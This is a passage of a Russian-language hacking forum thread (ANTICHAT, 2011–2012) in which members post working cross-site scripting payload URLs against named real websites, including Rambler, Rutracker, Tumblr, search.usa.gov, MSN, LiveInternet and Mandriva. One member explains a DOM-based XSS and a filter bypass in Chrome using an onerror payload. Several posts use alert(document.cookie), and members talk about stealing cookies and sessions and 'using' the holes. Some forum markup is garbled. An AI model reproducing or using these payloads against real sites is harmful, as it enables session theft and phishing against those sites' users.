HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости Mail-сервис
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #191  
Старый 28.11.2011, 15:01
Unknown
Guest
Сообщений: n/a
Провел на форуме:
0

Репутация: 49
По умолчанию

http://horoscopes.rambler.ru/psychology.html?id=1174592&sec=1174580">alert('XSS')
 
Ответить с цитированием

  #192  
Старый 05.01.2012, 00:57
kravch_v
Guest
Сообщений: n/a
Провел на форуме:
45485

Репутация: 1
По умолчанию

Крупнейший русскоязычный битторрент трекер.

Код:
Code:
http://pm.rutracker.org/forum/privmsg.php?mode=post">alert(document.cookie)
 
Ответить с цитированием

  #193  
Старый 05.01.2012, 02:43
kravch_v
Guest
Сообщений: n/a
Провел на форуме:
45485

Репутация: 1
По умолчанию

Рамблер.

Код:
Code:
http://horoscopes.rambler.ru/names.html?rubric=0&words=test">alert('xss')
Код:
Code:
http://help.rambler.ru/1/search/avia/?set=help&query=111">alert('xss')
Код:
Code:
http://planeta.rambler.ru/abuse.html?url=">alert('xss')
 
Ответить с цитированием

  #194  
Старый 05.01.2012, 06:07
M_script
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512

Репутация: 0
По умолчанию

Цитата:
Сообщение от kravch_v  
kravch_v said:
Google XSS!
Цитата:
Сообщение от kravch_v  
kravch_v said:
Кибер, сессию и куки спереть реально.
Было бы интересно почитать, как это сделать. JS выполняется даже не на поддомене, а на googleusercontent.com. Кроме опен-редиректа и фишинга юзеров гугла не могу придумать варианты использования этого бага.
 
Ответить с цитированием

  #195  
Старый 08.01.2012, 13:03
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию

Tumblr - сервис микроблоггинга
тИЦ 3600 PR 8

Код HTML:
HTML:
https://www.tumblr.com/register/join_tumblr?referring_blog=usagov%22%3E%3Cscript%3Ealert()%3C/script%3E
P.S. Достаточно известный сервис, можно юзнуть

--

USA Government


тИЦ 350 PR 10

Код:
Code:
http://search.usa.gov/search/news?affiliate=usa.govblog&locale=en&m=false&query=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&tbs=h
P.S. Тут есть ПП, поэтому может кому понадобится.
 
Ответить с цитированием

  #196  
Старый 19.01.2012, 05:54
Unknown
Guest
Сообщений: n/a
Провел на форуме:
0

Репутация: 49
По умолчанию

Ещё один msn.com


http://ringtones.nl.msn.com/games.php?rtch=1&rtlo=41992"/>
 
Ответить с цитированием

  #197  
Старый 19.01.2012, 09:58
M_script
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512

Репутация: 0
По умолчанию

Цитата:
Сообщение от dev1k  
dev1k said:
Ещё один msn.com

http://ringtones.nl.
msn.com
/games.php?rtch=1&rtlo=41992
"/>
Это не обычная пассивка, а DOM-based, поэтому защита от XSS в браузерах на нее не сработает.

Со страницы вызывается скрипт http://www.ringtonio.nl/javagames/?..., уязвимый к XSS в реферере.

Данные из реферера выводятся в двух местах:

Цитата:
Сообщение от None  
d.writeln('window.open (bd+"/send/javagame?id="+nr+"&clx=1&rths=0&brpc=&rtlo=
41992\"/>
","sendpop","toolbar=no,location=no,directories=no ,status=yes,menubar=no,scrollbars=yes,resizable=no ,copyhistory=no,width=600,height=450,screenX=0,scr eenY=0,top=0,left=0");');
Цитата:
Сообщение от None  
d.writeln('[/COLOR][/B]
">');
Видно, что кавычки экранируются. Но это происходит внутри строки в функции вывода, поэтому на странице экранирования не будет.

В примере используется второй вариант вывода - внутри тега input. Но зачем лишние символы?

http://ringtones.nl.msn.com/games.php?rtch=1&rtlo=41992">[/COLOR]

Без них все работает нормально:

[B]http://ringtones.nl.msn.com/games.php?rtlo=">
 
Ответить с цитированием

  #198  
Старый 19.01.2012, 19:04
thrust
Guest
Сообщений: n/a
Провел на форуме:
17229

Репутация: 31
По умолчанию

liveinternet.ru

Код:
Code:
http://www.liveinternet.ru/tests.php?cmd=show&session_id=7f00c824a22d703516ea5e7e94fc4a1b&order=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
Код:
Code:
http://www.liveinternet.ru/search/?q=">alert(document.cookie)
 
Ответить с цитированием

  #199  
Старый 21.01.2012, 21:57
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию

[CODE]
Code:
http://muziek.downloaden.nl.msn.com/artist.php?artist=2pac">alert(document.cookie)
 
Ответить с цитированием

  #200  
Старый 22.01.2012, 18:07
M_script
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512

Репутация: 0
По умолчанию

Цитата:
Сообщение от Ereee  
Ereee said:
P.S. Xss с mandriva пашет только в Opera+IE.
Продолжаем знакомство с XSS.

Тема урока - "почему в одном браузере работает, а в другом нет"

[B]http://store.mandriva.com/simple_popup_image.php?img='>alert()alert(1[COLOR="Green"])= 8 тоже).

"alert()" вырезается фильтром и XSS не срабатывает. Чтобы это увидеть, можно в окне браузера нажать правую кнопку мыши и выбрать "Inspect element"

На странице код внедряется внутри тега img.

Цитата:
Сообщение от None  

У этого тега есть события onload и onerror, поэтому нет смысла его закрывать и использовать тег script. Достаточно вставить такой код:

Цитата:
Сообщение от None  

http://store.mandriva.com/simple_popup_image.php?img='+onerror=alert(1)+

Этот вариант работает в IE (до 8 версии), опере, фф, но все так же не работает в хроме. Фильтр вырезает "=alert(1)".

Попробуем сделать так:

http://store.mandriva.com/simple_popup_image.php?img='onerror=alert(1);/

Код "alert(1);/" содержит ошибку синтаксиса JS и не будет выполняться браузером, поэтому фильтровать его (казалось бы) необязательно. Но посмотрим внимательнее на ответ сервера:

Цитата:
Сообщение от None  

Так как после onerror= нет открывающей кавычки, весь код до закрытия тега будет считаться значением onerror. Браузер этот код видит так:

Цитата:
Сообщение от None  

"alert(1);/'/" уже не содержит ошибок синтаксиса и выполняется хромом в обход фильтра.

Окончательный вариант:

http://store.mandriva.com/simple_popup_image.php?img='onerror=alert(1);/

Не работает в IE >= 8
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[ Обзор Уязвимостей .:Drupal :. ] Cawabunga Веб-уязвимости 43 12.01.2021 19:31
Cross Site Scripting FAQ k00p3r Уязвимости 6 12.06.2005 16:23



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ